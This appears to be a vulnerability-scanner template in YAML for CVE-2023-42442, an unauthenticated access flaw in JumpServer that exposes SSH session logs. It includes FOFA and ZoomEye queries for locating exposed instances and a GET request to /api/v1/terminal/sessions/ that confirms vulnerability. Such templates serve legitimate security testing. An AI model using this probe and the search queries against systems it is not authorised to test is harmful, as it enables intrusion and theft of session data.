product: JumpServer
vName: JumpServer 未授权访问
type: 访问控制
vID:
  - CVE-2023-42442
  - CNNVD-202309-1115
level: 3
vDesc: 该漏洞存在于JumpServer中，是一个未授权访问漏洞。api/api/v1/terminal/sessions/权限控制存在逻辑错误，可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志，并可借此远程窃取敏感信息。存储在
  S3、OSS 或其他云存储中的ssh会话不受影响。
version: 3.0.0 <= JumpServer <= 3.5.4、3.6.0 <= JumpServer <= 3.6.3
note: ''
search:
  FOFA: app="JumpServer-堡垒机"
  ZoomEye: app:"飞致云堡垒机"
protocol: http
link: https://cloud.tencent.com/developer/article/2334391
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/v1/terminal/sessions/
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - application/json
            logic: and
          body:
            value:
              - asset_id
            logic: and